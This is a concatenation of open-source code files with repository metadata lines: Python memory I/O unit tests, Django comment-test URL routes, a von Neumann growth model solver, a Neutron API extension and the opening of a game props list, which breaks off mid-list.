self.assertEqual(f.tell(), 1)
def test_write(self):
buf = self.buftype("hello world\n")
memio = self.ioclass(buf)
self.write_ops(memio, self.buftype)
self.assertEqual(memio.getvalue(), buf)
memio = self.ioclass()
self.write_ops(memio, self.buftype)
self.assertEqual(memio.getvalue(), buf)
self.assertRaises(TypeError, memio.write, None)
memio.close()
self.assertRaises(ValueError, memio.write, self.buftype(""))
def test_writelines(self):
buf = self.buftype("1234567890")
memio = self.ioclass()
self.assertEqual(memio.writelines([buf] * 100), None)
self.assertEqual(memio.getvalue(), buf * 100)
memio.writelines([])
self.assertEqual(memio.getvalue(), buf * 100)
memio = self.ioclass()
self.assertRaises(TypeError, memio.writelines, [buf] + [1])
self.assertEqual(memio.getvalue(), buf)
self.assertRaises(TypeError, memio.writelines, None)
memio.close()
self.assertRaises(ValueError, memio.writelines, [])
def test_writelines_error(self):
memio = self.ioclass()
def error_gen():
yield self.buftype('spam')
raise KeyboardInterrupt
self.assertRaises(KeyboardInterrupt, memio.writelines, error_gen())
def test_truncate(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertRaises(ValueError, memio.truncate, -1)
memio.seek(6)
self.assertEqual(memio.truncate(), 6)
self.assertEqual(memio.getvalue(), buf[:6])
self.assertEqual(memio.truncate(4), 4)
self.assertEqual(memio.getvalue(), buf[:4])
# truncate() accepts long objects
self.assertEqual(memio.truncate(4L), 4)
self.assertEqual(memio.getvalue(), buf[:4])
self.assertEqual(memio.tell(), 6)
memio.seek(0, 2)
memio.write(buf)
self.assertEqual(memio.getvalue(), buf[:4] + buf)
pos = memio.tell()
self.assertEqual(memio.truncate(None), pos)
self.assertEqual(memio.tell(), pos)
self.assertRaises(TypeError, memio.truncate, '0')
memio.close()
self.assertRaises(ValueError, memio.truncate, 0)
def test_init(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.getvalue(), buf)
memio = self.ioclass(None)
self.assertEqual(memio.getvalue(), self.EOF)
memio.__init__(buf * 2)
self.assertEqual(memio.getvalue(), buf * 2)
memio.__init__(buf)
self.assertEqual(memio.getvalue(), buf)
def test_read(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.read(0), self.EOF)
self.assertEqual(memio.read(1), buf[:1])
# read() accepts long objects
self.assertEqual(memio.read(4L), buf[1:5])
self.assertEqual(memio.read(900), buf[5:])
self.assertEqual(memio.read(), self.EOF)
memio.seek(0)
self.assertEqual(memio.read(), buf)
self.assertEqual(memio.read(), self.EOF)
self.assertEqual(memio.tell(), 10)
memio.seek(0)
self.assertEqual(memio.read(-1), buf)
memio.seek(0)
self.assertEqual(type(memio.read()), type(buf))
memio.seek(100)
self.assertEqual(type(memio.read()), type(buf))
memio.seek(0)
self.assertEqual(memio.read(None), buf)
self.assertRaises(TypeError, memio.read, '')
memio.close()
self.assertRaises(ValueError, memio.read)
def test_readline(self):
buf = self.buftype("1234567890\n")
memio = self.ioclass(buf * 2)
self.assertEqual(memio.readline(0), self.EOF)
self.assertEqual(memio.readline(), buf)
self.assertEqual(memio.readline(), buf)
self.assertEqual(memio.readline(), self.EOF)
memio.seek(0)
self.assertEqual(memio.readline(5), buf[:5])
# readline() accepts long objects
self.assertEqual(memio.readline(5L), buf[5:10])
self.assertEqual(memio.readline(5), buf[10:15])
memio.seek(0)
self.assertEqual(memio.readline(-1), buf)
memio.seek(0)
self.assertEqual(memio.readline(0), self.EOF)
buf = self.buftype("1234567890\n")
memio = self.ioclass((buf * 3)[:-1])
self.assertEqual(memio.readline(), buf)
self.assertEqual(memio.readline(), buf)
self.assertEqual(memio.readline(), buf[:-1])
self.assertEqual(memio.readline(), self.EOF)
memio.seek(0)
self.assertEqual(type(memio.readline()), type(buf))
self.assertEqual(memio.readline(), buf)
self.assertRaises(TypeError, memio.readline, '')
memio.close()
self.assertRaises(ValueError, memio.readline)
def test_readlines(self):
buf = self.buftype("1234567890\n")
memio = self.ioclass(buf * 10)
self.assertEqual(memio.readlines(), [buf] * 10)
memio.seek(5)
self.assertEqual(memio.readlines(), [buf[5:]] + [buf] * 9)
memio.seek(0)
# readlines() accepts long objects
self.assertEqual(memio.readlines(15L), [buf] * 2)
memio.seek(0)
self.assertEqual(memio.readlines(-1), [buf] * 10)
memio.seek(0)
self.assertEqual(memio.readlines(0), [buf] * 10)
memio.seek(0)
self.assertEqual(type(memio.readlines()[0]), type(buf))
memio.seek(0)
self.assertEqual(memio.readlines(None), [buf] * 10)
self.assertRaises(TypeError, memio.readlines, '')
memio.close()
self.assertRaises(ValueError, memio.readlines)
def test_iterator(self):
buf = self.buftype("1234567890\n")
memio = self.ioclass(buf * 10)
self.assertEqual(iter(memio), memio)
self.assertTrue(hasattr(memio, '__iter__'))
self.assertTrue(hasattr(memio, 'next'))
i = 0
for line in memio:
self.assertEqual(line, buf)
i += 1
self.assertEqual(i, 10)
memio.seek(0)
i = 0
for line in memio:
self.assertEqual(line, buf)
i += 1
self.assertEqual(i, 10)
memio = self.ioclass(buf * 2)
memio.close()
self.assertRaises(ValueError, next, memio)
def test_getvalue(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.getvalue(), buf)
memio.read()
self.assertEqual(memio.getvalue(), buf)
self.assertEqual(type(memio.getvalue()), type(buf))
memio = self.ioclass(buf * 1000)
self.assertEqual(memio.getvalue()[-3:], self.buftype("890"))
memio = self.ioclass(buf)
memio.close()
self.assertRaises(ValueError, memio.getvalue)
def test_seek(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
memio.read(5)
self.assertRaises(ValueError, memio.seek, -1)
self.assertRaises(ValueError, memio.seek, 1, -1)
self.assertRaises(ValueError, memio.seek, 1, 3)
self.assertEqual(memio.seek(0), 0)
self.assertEqual(memio.seek(0, 0), 0)
self.assertEqual(memio.read(), buf)
self.assertEqual(memio.seek(3), 3)
# seek() accepts long objects
self.assertEqual(memio.seek(3L), 3)
self.assertEqual(memio.seek(0, 1), 3)
self.assertEqual(memio.read(), buf[3:])
self.assertEqual(memio.seek(len(buf)), len(buf))
self.assertEqual(memio.read(), self.EOF)
memio.seek(len(buf) + 1)
self.assertEqual(memio.read(), self.EOF)
self.assertEqual(memio.seek(0, 2), len(buf))
self.assertEqual(memio.read(), self.EOF)
memio.close()
self.assertRaises(ValueError, memio.seek, 0)
def test_overseek(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.seek(len(buf) + 1), 11)
self.assertEqual(memio.read(), self.EOF)
self.assertEqual(memio.tell(), 11)
self.assertEqual(memio.getvalue(), buf)
memio.write(self.EOF)
self.assertEqual(memio.getvalue(), buf)
memio.write(buf)
self.assertEqual(memio.getvalue(), buf + self.buftype('\0') + buf)
def test_tell(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.tell(), 0)
memio.seek(5)
self.assertEqual(memio.tell(), 5)
memio.seek(10000)
self.assertEqual(memio.tell(), 10000)
memio.close()
self.assertRaises(ValueError, memio.tell)
def test_flush(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.flush(), None)
def test_flags(self):
memio = self.ioclass()
self.assertEqual(memio.writable(), True)
self.assertEqual(memio.readable(), True)
self.assertEqual(memio.seekable(), True)
self.assertEqual(memio.isatty(), False)
self.assertEqual(memio.closed, False)
memio.close()
self.assertRaises(ValueError, memio.writable)
self.assertRaises(ValueError, memio.readable)
self.assertRaises(ValueError, memio.seekable)
self.assertRaises(ValueError, memio.isatty)
self.assertEqual(memio.closed, True)
def test_subclassing(self):
buf = self.buftype("1234567890")
def test1():
class MemIO(self.ioclass):
pass
m = MemIO(buf)
return m.getvalue()
def test2():
class MemIO(self.ioclass):
def __init__(me, a, b):
self.ioclass.__init__(me, a)
m = MemIO(buf, None)
return m.getvalue()
self.assertEqual(test1(), buf)
self.assertEqual(test2(), buf)
def test_instance_dict_leak(self):
# Test case for issue #6242.
# This will be caught by regrtest.py -R if this leak.
for _ in range(100):
memio = self.ioclass()
memio.foo = 1
def test_pickling(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
memio.foo = 42
memio.seek(2)
class PickleTestMemIO(self.ioclass):
def __init__(me, initvalue, foo):
self.ioclass.__init__(me, initvalue)
me.foo = foo
# __getnewargs__ is undefined on purpose. This checks that PEP 307
# is used to provide pickling support.
# Pickle expects the class to be on the module level. Here we use a
# little hack to allow the PickleTestMemIO class to derive from
# self.ioclass without having to define all combinations explicitly on
# the module-level.
import __main__
PickleTestMemIO.__module__ = '__main__'
__main__.PickleTestMemIO = PickleTestMemIO
submemio = PickleTestMemIO(buf, 80)
submemio.seek(2)
# We only support pickle protocol 2 and onward since we use extended
# __reduce__ API of PEP 307 to provide pickling support.
for proto in range(2, pickle.HIGHEST_PROTOCOL):
for obj in (memio, submemio):
obj2 = pickle.loads(pickle.dumps(obj, protocol=proto))
self.assertEqual(obj.getvalue(), obj2.getvalue())
self.assertEqual(obj.__class__, obj2.__class__)
self.assertEqual(obj.foo, obj2.foo)
self.assertEqual(obj.tell(), obj2.tell())
obj.close()
self.assertRaises(ValueError, pickle.dumps, obj, proto)
del __main__.PickleTestMemIO
class PyBytesIOTest(MemoryTestMixin, MemorySeekTestMixin, unittest.TestCase):
UnsupportedOperation = pyio.UnsupportedOperation
# When Jython tries to use UnsupportedOperation as _pyio defines it, it runs
# into a problem with multiple inheritance and the slots array: issue 1996.
# Override the affected test version just so we can skip it visibly.
@unittest.skipIf(support.is_jython, "FIXME: Jython issue 1996")
def test_detach(self):
pass
@staticmethod
def buftype(s):
return s.encode("ascii")
ioclass = pyio.BytesIO
EOF = b""
def test_read1(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertRaises(TypeError, memio.read1)
self.assertEqual(memio.read(), buf)
def test_readinto(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
b = bytearray(b"hello")
self.assertEqual(memio.readinto(b), 5)
self.assertEqual(b, b"12345")
self.assertEqual(memio.readinto(b), 5)
self.assertEqual(b, b"67890")
self.assertEqual(memio.readinto(b), 0)
self.assertEqual(b, b"67890")
b = bytearray(b"hello world")
memio.seek(0)
self.assertEqual(memio.readinto(b), 10)
self.assertEqual(b, b"1234567890d")
b = bytearray(b"")
memio.seek(0)
self.assertEqual(memio.readinto(b), 0)
self.assertEqual(b, b"")
self.assertRaises(TypeError, memio.readinto, '')
import array
a = array.array(b'b', b"hello world")
memio = self.ioclass(buf)
memio.readinto(a)
self.assertEqual(a.tostring(), b"1234567890d")
memio.close()
self.assertRaises(ValueError, memio.readinto, b)
memio = self.ioclass(b"123")
b = bytearray()
memio.seek(42)
memio.readinto(b)
self.assertEqual(b, b"")
def test_relative_seek(self):
buf = self.buftype("1234567890")
memio = self.ioclass(buf)
self.assertEqual(memio.seek(-1, 1), 0)
self.assertEqual(memio.seek(3, 1), 3)
self.assertEqual(memio.seek(-4, 1), 0)
self.assertEqual(memio.seek(-1, 2), 9)
self.assertEqual(memio.seek(1, 1), 10)
self.assertEqual(memio.seek(1, 2), 11)
memio.seek(-3, 2)
self.assertEqual(memio.read(), buf[-3:])
memio.seek(0)
memio.seek(1, 1)
self.assertEqual(memio.read(), buf[1:])
def test_unicode(self):
memio = self.ioclass()
self.assertRaises(TypeError, self.ioclass, "1234567890")
self.assertRaises(TypeError, memio.write, "1234567890")
self.assertRaises(TypeError, memio.writelines, ["1234567890"])
def test_bytes_array(self):
buf = b"1234567890"
import array
a = array.array(b'b', buf)
memio = self.ioclass(a)
self.assertEqual(memio.getvalue(), buf)
self.assertEqual(memio.write(a), 10)
self.assertEqual(memio.getvalue(), buf)
def test_issue5449(self):
buf = self.buftype("1234567890")
self.ioclass(initial_bytes=buf)
self.assertRaises(TypeError, self.ioclass, buf, foo=None)
class TextIOTestMixin:
def test_newlines_property(self):
memio = self.ioclass(newline=None)
# The C StringIO decodes newlines in write() calls, but the Python
# implementation only does when reading. This function forces them to
# be decoded for testing.
def force_decode():
memio.seek(0)
memio.read()
self.assertEqual(memio.newlines, None)
memio.write("a\n")
force_decode()
self.assertEqual(memio.newlines, "\n")
memio.write("b\r\n")
force_decode()
self.assertEqual(memio.newlines, ("\n", "\r\n"))
memio.write("c\rd")
force_decode()
self.assertEqual(memio.newlines, ("\r", "\n", "\r\n"))
def test_relative_seek(self):
memio = self.ioclass()
self.assertRaises(IOError, memio.seek, -1, 1)
self.assertRaises(IOError, memio.seek, 3, 1)
self.assertRaises(IOError, memio.seek, -3, 1)
self.assertRaises(IOError, memio.seek, -1, 2)
self.assertRaises(IOError, memio.seek, 1, 1)
self.assertRaises(IOError, memio.seek, 1, 2)
def test_textio_properties(self):
memio = self.ioclass()
# These are just dummy values but we nevertheless check them for fear
# of unexpected breakage.
self.assertIsNone(memio.encoding)
self.assertIsNone(memio.errors)
self.assertFalse(memio.line_buffering)
def test_newline_none(self):
# newline=None
memio = self.ioclass("a\nb\r\nc\rd", newline=None)
self.assertEqual(list(memio), ["a\n", "b\n", "c\n", "d"])
memio.seek(0)
self.assertEqual(memio.read(1), "a")
self.assertEqual(memio.read(2), "\nb")
self.assertEqual(memio.read(2), "\nc")
self.assertEqual(memio.read(1), "\n")
memio = self.ioclass(newline=None)
self.assertEqual(2, memio.write("a\n"))
self.assertEqual(3, memio.write("b\r\n"))
self.assertEqual(3, memio.write("c\rd"))
memio.seek(0)
self.assertEqual(memio.read(), "a\nb\nc\nd")
memio = self.ioclass("a\r\nb", newline=None)
self.assertEqual(memio.read(3), "a\nb")
def test_newline_empty(self):
# newline=""
memio = self.ioclass("a\nb\r\nc\rd", newline="")
self.assertEqual(list(memio), ["a\n", "b\r\n", "c\r", "d"])
memio.seek(0)
self.assertEqual(memio.read(4), "a\nb\r")
self.assertEqual(memio.read(2), "\nc")
self.assertEqual(memio.read(1), "\r")
memio = self.ioclass(newline="")
self.assertEqual(2, memio.write("a\n"))
self.assertEqual(2, memio.write("b\r"))
self.assertEqual(2, memio.write("\nc"))
self.assertEqual(2, memio.write("\rd"))
memio.seek(0)
self.assertEqual(list(memio), ["a\n", "b\r\n", "c\r", "d"])
def test_newline_lf(self):
# newline="\n"
memio = self.ioclass("a\nb\r\nc\rd")
self.assertEqual(list(memio), ["a\n", "b\r\n", "c\rd"])
def test_newline_cr(self):
# newline="\r"
memio = self.ioclass("a\nb\r\nc\rd", newline="\r")
self.assertEqual(memio.read(), "a\rb\r\rc\rd")
memio.seek(0)
self.assertEqual(list(memio), ["a\r", "b\r", "\r", "c\r", "d"])
def test_newline_crlf(self):
# newline="\r\n"
memio = self.ioclass("a\nb\r\nc\rd", newline="\r\n")
self.assertEqual(memio.read(), "a\r\nb\r\r\nc\rd")
memio.seek(0)
self.assertEqual(list(memio), ["a\r\n", "b\r\r\n", "c\rd"])
def test_issue5265(self):
# StringIO can duplicate newlines in universal newlines mode
memio = self.ioclass("a\r\nb\r\n", newline=None)
self.assertEqual(memio.read(5), "a\nb\n")
class PyStringIOTest(MemoryTestMixin, MemorySeekTestMixin,
TextIOTestMixin, unittest.TestCase):
buftype = unicode
ioclass = pyio.StringIO
UnsupportedOperation = pyio.UnsupportedOperation
EOF = ""
# When Jython tries to use UnsupportedOperation as _pyio defines it, it runs
# into a problem with multiple inheritance and the slots array: issue 1996.
# Override the affected test version just so we can skip it visibly.
@unittest.skipIf(support.is_jython, "FIXME: Jython issue 1996")
def test_detach(self):
pass
class PyStringIOPickleTest(TextIOTestMixin, unittest.TestCase):
"""Test if pickle restores properly the internal state of StringIO.
"""
buftype = unicode
UnsupportedOperation = pyio.UnsupportedOperation
EOF = ""
class ioclass(pyio.StringIO):
def __new__(cls, *args, **kwargs):
return pickle.loads(pickle.dumps(pyio.StringIO(*args, **kwargs)))
def __init__(self, *args, **kwargs):
pass
class CBytesIOTest(PyBytesIOTest):
ioclass = io.BytesIO
UnsupportedOperation = io.UnsupportedOperation
test_bytes_array = unittest.skip(
"array.array() does not have the new buffer API"
)(PyBytesIOTest.test_bytes_array)
# Re-instate test_detach skipped by Jython in PyBytesIOTest
if support.is_jython: # FIXME: Jython issue 1996
test_detach = MemoryTestMixin.test_detach
def test_getstate(self):
memio = self.ioclass()
state = memio.__getstate__()
self.assertEqual(len(state), 3)
bytearray(state[0]) # Check if state[0] supports the buffer interface.
self.assertIsInstance(state[1], int)
self.assertTrue(isinstance(state[2], dict) or state[2] is None)
memio.close()
self.assertRaises(ValueError, memio.__getstate__)
def test_setstate(self):
# This checks whether __setstate__ does proper input validation.
memio = self.ioclass()
memio.__setstate__((b"no error", 0, None))
memio.__setstate__((bytearray(b"no error"), 0, None))
memio.__setstate__((b"no error", 0, {'spam': 3}))
self.assertRaises(ValueError, memio.__setstate__, (b"", -1, None))
self.assertRaises(TypeError, memio.__setstate__, ("unicode", 0, None))
self.assertRaises(TypeError, memio.__setstate__, (b"", 0.0, None))
self.assertRaises(TypeError, memio.__setstate__, (b"", 0, 0))
self.assertRaises(TypeError, memio.__setstate__, (b"len-test", 0))
self.assertRaises(TypeError, memio.__setstate__)
self.assertRaises(TypeError, memio.__setstate__, 0)
memio.close()
self.assertRaises(ValueError, memio.__setstate__, (b"closed", 0, None))
check_sizeof = support.check_sizeof
@support.cpython_only
def test_sizeof(self):
basesize = support.calcobjsize(b'P2PP2P')
check = self.check_sizeof
self.assertEqual(object.__sizeof__(io.BytesIO()), basesize)
check(io.BytesIO(), basesize )
check(io.BytesIO(b'a'), basesize + 1 + 1 )
check(io.BytesIO(b'a' * 1000), basesize + 1000 + 1 )
class CStringIOTest(PyStringIOTest):
ioclass = io.StringIO
UnsupportedOperation = io.UnsupportedOperation
# XXX: For the Python version of io.StringIO, this is highly
# dependent on the encoding used for the underlying buffer.
# Re-instate test_detach skipped by Jython in PyBytesIOTest
if support.is_jython: # FIXME: Jython issue 1996
test_detach = MemoryTestMixin.test_detach
# This test checks that tell() results are consistent with the length of
# text written, but this is not documented in the API: only that seek()
# accept what tell() returns.
@unittest.skipIf(support.is_jython, "Exact value of tell() is CPython specific")
def test_widechar(self):
buf = self.buftype("\U0002030a\U00020347")
memio = self.ioclass(buf)
self.assertEqual(memio.getvalue(), buf)
self.assertEqual(memio.write(buf), len(buf))
self.assertEqual(memio.tell(), len(buf))
self.assertEqual(memio.getvalue(), buf)
self.assertEqual(memio.write(buf), len(buf))
self.assertEqual(memio.tell(), len(buf) * 2)
self.assertEqual(memio.getvalue(), buf + buf)
# This test checks that seek() accepts what tell() returns, without requiring
# that tell() return a particular absolute value. Conceived for Jython, but
# probably universal.
def test_widechar_seek(self):
buf = self.buftype("\U0002030aX\u00ca\U00020347\u05d1Y\u0628Z")
memio = self.ioclass(buf)
self.assertEqual(memio.getvalue(), buf)
# For each character in buf, read it back from memio and its tell value
chars = list(buf)
tells = list()
for ch in chars :
tells.append(memio.tell())
self.assertEqual(memio.read(1), ch)
# For each character in buf, seek to it and check it's there
chpos = zip(chars, tells)
chpos.reverse()
for ch, pos in chpos:
memio.seek(pos)
self.assertEqual(memio.read(1), ch)
# Check write after seek to end
memio.seek(0, 2)
self.assertEqual(memio.write(buf), len(buf))
self.assertEqual(memio.getvalue(), buf + buf)
def test_getstate(self):
memio = self.ioclass()
state = memio.__getstate__()
self.assertEqual(len(state), 4)
self.assertIsInstance(state[0], unicode)
self.assertIsInstance(state[1], str)
self.assertIsInstance(state[2], int)
self.assertTrue(isinstance(state[3], dict) or state[3] is None)
memio.close()
self.assertRaises(ValueError, memio.__getstate__)
def test_setstate(self):
# This checks whether __setstate__ does proper input validation.
memio = self.ioclass()
memio.__setstate__(("no error", "\n", 0, None))
memio.__setstate__(("no error", "", 0, {'spam': 3}))
self.assertRaises(ValueError, memio.__setstate__, ("", "f", 0, None))
self.assertRaises(ValueError, memio.__setstate__, ("", "", -1, None))
self.assertRaises(TypeError, memio.__setstate__, (b"", "", 0, None))
# trunk is more tolerant than py3k on the type of the newline param
#self.assertRaises(TypeError, memio.__setstate__, ("", b"", 0, None))
self.assertRaises(TypeError, memio.__setstate__, ("", "", 0.0, None))
self.assertRaises(TypeError, memio.__setstate__, ("", "", 0, 0))
self.assertRaises(TypeError, memio.__setstate__, ("len-test", 0))
self.assertRaises(TypeError, memio.__setstate__)
self.assertRaises(TypeError, memio.__setstate__, 0)
memio.close()
self.assertRaises(ValueError, memio.__setstate__, ("closed", "", 0, None))
class CStringIOPickleTest(PyStringIOPickleTest):
UnsupportedOperation = io.UnsupportedOperation
class ioclass(io.StringIO):
def __new__(cls, *args, **kwargs):
return pickle.loads(pickle.dumps(io.StringIO(*args, **kwargs),
protocol=2))
def __init__(self, *args, **kwargs):
pass
def test_main():
tests = [PyBytesIOTest, PyStringIOTest, CBytesIOTest, CStringIOTest,
PyStringIOPickleTest, CStringIOPickleTest]
support.run_unittest(*tests)
if __name__ == '__main__':
test_main()
|
NeuralEnsemble/neuroConstruct
|
lib/jython/Lib/test/test_memoryio.py
|
Python
|
gpl-2.0
| 28,397
|
from __future__ import absolute_import
from django.conf.urls import patterns, url
from django.contrib.comments.feeds import LatestCommentFeed
from .custom_comments import views
feeds = {
'comments': LatestCommentFeed,
}
urlpatterns = patterns('',
url(r'^post/$', views.custom_submit_comment),
url(r'^flag/(\d+)/$', views.custom_flag_comment),
url(r'^delete/(\d+)/$', views.custom_delete_comment),
url(r'^approve/(\d+)/$', views.custom_approve_comment),
)
urlpatterns += patterns('',
(r'^rss/comments/$', LatestCommentFeed()),
)
|
LethusTI/supportcenter
|
vendor/django/tests/regressiontests/comment_tests/urls.py
|
Python
|
gpl-3.0
| 559
|
"""
Filename: neumann.py
Generalized von Neumann growth model
Author: Balint Szoke
Date: 07/17/2015
Last update: 10/07/2016
"""
import numpy as np
from scipy.linalg import solve
from scipy.optimize import fsolve, linprog
from textwrap import dedent
class neumann(object):
"""
This class describes the Generalized von Neumann growth model as it was
discussed in Kemeny et al. (1956, ECTA) and Gale (1960, Chapter 9.5):
Let:
n ... number of goods
m ... number of activities
A ... input matrix is m-by-n
a_{i,j} - amount of good j consumed by activity i
B ... output matrix is m-by-n
b_{i,j} - amount of good j produced by activity i
x ... intensity vector (m-vector) with nonnegative entries
x'B - the vector of goods produced
x'A - the vector of goods consumed
p ... price vector (n-vector) with nonnegative entries
Bp - the revenue vector for every activity
Ap - the cost of each activity
Both A and B have nonnegative entries. Moreover, we assume that
(1) Assumption I (every good which is consumed is also produced):
for all j, b_{.,j} > 0, i.e. at least one entry is strictly positive
(2) Assumption II (no free lunch):
for all i, a_{i,.} > 0, i.e. at least one entry is strictly positive
Parameters
----------
A : array_like or scalar(float)
Part of the state transition equation. It should be `n x n`
B : array_like or scalar(float)
Part of the state transition equation. It should be `n x k`
Attributes
----------
A, B: see Parameters
n, m : scalar(int)
number of goods and activities, respectively
"""
def __init__(self, A, B):
self.A, self.B = list(map(self.convert, (A, B)))
self.m, self.n = self.A.shape
# Check if (A,B) satisfy the basic assumptions
assert self.A.shape == self.B.shape, 'The input and output matrices must have the same dimensions!'
assert (self.A >= 0).all() and (self.B >= 0).all(), 'The input and output matrices must have only nonnegative entries!'
# (1) Check whether Assumption I is satisfied:
if (np.sum(B, 0) <= 0).any():
self.AI = False
else:
self.AI = True
# (2) Check whether Assumption II is satisfied:
if (np.sum(A, 1) <= 0).any():
self.AII = False
else:
self.AII = True
# Check irreducibility:
#self.irreducible = True
def __repr__(self):
return self.__str__()
def __str__(self):
me = """
Generalized von Neumann expanding model:
- number of goods : {n}
- number of activities : {m}
Assumptions:
- AI: every column of B has a positive entry : {AI}
- AII: every row of A has a positive entry : {AII}
"""
#Irreducible : {irr}
return dedent(me.format(n = self.n, m = self.m,
AI = self.AI, AII = self.AII))
#irr = self.irreducible))
def convert(self, x):
"""
Convert array_like objects (lists of lists, floats, etc.) into
well formed 2D NumPy arrays
"""
return np.atleast_2d(np.asarray(x))
def bounds(self):
"""
Calculate the trivial upper and lower bounds for alpha (expansion rate) and
beta (interest factor). See the proof of Theorem 9.8 in Gale (1960).
Outputs:
--------
LB: scalar
lower bound for alpha, beta
UB: scalar
upper bound for alpha, beta
"""
n, m = self.n, self.m
A, B = self.A, self.B
f = lambda alpha: ((B - alpha*A) @ np.ones((n, 1))).max()
g = lambda beta: (np.ones((1, m)) @ (B - beta*A)).min()
UB = np.asscalar(fsolve(f, 1))
LB = np.asscalar(fsolve(g, 2))
return LB, UB
def zerosum(self, gamma, dual = False):
"""
Given gamma, calculate the value and optimal strategies of a two-player
zero-sum game given by the matrix
M(gamma) = B - gamma*A.
Row player maximizing, column player minimizing
Zero-sum game as an LP (primal --> alpha)
max (0', 1) @ (x', v)
subject to
[-M', ones(n, 1)] @ (x', v)' <= 0
(x', v) @ (ones(m, 1), 0) = 1
(x', v) >= (0', -inf)
Zero-sum game as an LP (dual --> beta)
min (0', 1) @ (p', u)
subject to
[M, -ones(m, 1)] @ (p', u)' <= 0
(p', u) @ (ones(n, 1), 0) = 1
(p', u) >= (0', -inf)
Outputs:
--------
value: scalar
value of the zero-sum game
strategy: vector
if dual = False, it is the intensity vector,
if dual = True, it is the price vector
"""
A, B, n, m = self.A, self.B, self.n, self.m
M = B - gamma*A
if dual == False:
# Solve the primal LP (for details see the description)
# (1) Define the problem for v as a maximization (linprog minimizes)
c = np.hstack([np.zeros(m), -1])
# (2) Add constraints :
# ... non-negativity constaints
bounds = tuple(m * [(0, None)] + [(None, None)])
# ... inequality constaints
A_iq = np.hstack([-M.T, np.ones((n, 1))])
b_iq = np.zeros((n, 1))
# ... normalization
A_eq = np.hstack([np.ones(m), 0]).reshape(1, m + 1)
b_eq = 1
res = linprog(c, A_ub = A_iq, b_ub = b_iq, A_eq = A_eq, b_eq = b_eq,
bounds = bounds, options = dict(bland = True, tol = 1e-8))
else:
# Solve the dual LP (for details see the description)
# (1) Define the problem for v as a maximization (linprog minimizes)
c = np.hstack([np.zeros(n), 1])
# (2) Add constraints :
# ... non-negativity constaints
bounds = tuple(n * [(0, None)] + [(None, None)])
# ... inequality constaints
A_iq = np.hstack([M, -np.ones((m, 1))])
b_iq = np.zeros((m, 1))
# ... normalization
A_eq = np.hstack([np.ones(n), 0]).reshape(1, n + 1)
b_eq = 1
res = linprog(c, A_ub = A_iq, b_ub = b_iq, A_eq = A_eq, b_eq = b_eq,
bounds = bounds, options = dict(bland = True, tol = 1e-8))
if res.status != 0:
print(res.message)
# Pull out the required quantities
value = res.x[-1]
strategy = res.x[:-1]
return value, strategy
def expansion(self, tol = 1e-8, maxit = 1000):
"""
The algorithm used here is described in Hamburger-Thompson-Weil (1967, ECTA).
It is based on a simple bisection argument and utilizes the idea that for
a given gamma (= alpha or beta), the matrix "M = B - gamma*A" defines a
two-player zero-sum game, where the optimal strategies are the (normalized)
intensity and price vector.
Outputs:
--------
alpha: scalar
optimal expansion rate
"""
LB, UB = self.bounds()
for iter in range(maxit):
gamma = (LB + UB) / 2
ZS = self.zerosum(gamma = gamma)
V = ZS[0] # value of the game with gamma
if V >= 0:
LB = gamma
else:
UB = gamma
if abs(UB - LB) < tol:
gamma = (UB + LB) / 2
x = self.zerosum(gamma = gamma)[1]
p = self.zerosum(gamma = gamma, dual = True)[1]
break
return gamma, x, p
def interest(self, tol = 1e-8, maxit = 1000):
"""
The algorithm used here is described in Hamburger-Thompson-Weil (1967, ECTA).
It is based on a simple bisection argument and utilizes the idea that for
a given gamma (= alpha or beta), the matrix "M = B - gamma*A" defines a
two-player zero-sum game, where the optimal strategies are the (normalized)
intensity and price vector.
Outputs:
--------
beta: scalar
optimal interest rate
"""
LB, UB = self.bounds()
for iter in range(maxit):
gamma = (LB + UB) / 2
ZS = self.zerosum(gamma = gamma, dual = True)
V = ZS[0]
if V > 0:
LB = gamma
else:
UB = gamma
if abs(UB - LB) < tol:
gamma = (UB + LB) / 2
p = self.zerosum(gamma = gamma, dual = True)[1]
x = self.zerosum(gamma = gamma)[1]
break
return gamma, x, p
|
QuantEcon/QuantEcon.notebooks
|
dependencies/neumann.py
|
Python
|
bsd-3-clause
| 8,926
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron.api import extensions
_ALIAS = 'project-id'
class Project_id(extensions.ExtensionDescriptor):
"""Extension that indicates that project_id is enabled.
This extension indicates that the Keystone V3 'project_id' field
is supported in the API.
"""
extensions.register_custom_supported_check(
_ALIAS, lambda: True, plugin_agnostic=True
)
@classmethod
def get_name(cls):
return "project_id field enabled"
@classmethod
def get_alias(cls):
return _ALIAS
@classmethod
def get_description(cls):
return "Extension that indicates that project_id field is enabled."
@classmethod
def get_updated(cls):
return "2016-09-09T09:09:09-09:09"
@classmethod
def get_resources(cls):
return []
def get_extended_resources(self, version):
return {}
|
sebrandon1/neutron
|
neutron/extensions/project_id.py
|
Python
|
apache-2.0
| 1,418
|
from pandac.PandaModules import *
from direct.actor import Actor
from direct.directnotify import DirectNotifyGlobal
from otp.otpbase import OTPGlobals
import random
Props = ((5, 'partyBall', 'partyBall'),
(5,
'feather',
'feather-mod',
'feather-chan'),
(5, 'lips', 'lips'),
(5, 'lipstick', 'lipstick'),
(5, 'hat', 'hat'),
(5, 'cane', 'cane'),
(5,
'cubes',
'cubes-mod',
'cubes-chan'),
(5, 'ladder', 'ladder2'),
(4,
'fishing-pole',
'fishing-pole-mod',
'fishing-pole-chan'),
(5,
'1dollar',
'1dollar-bill-mod',
'1dollar-bill-chan'),
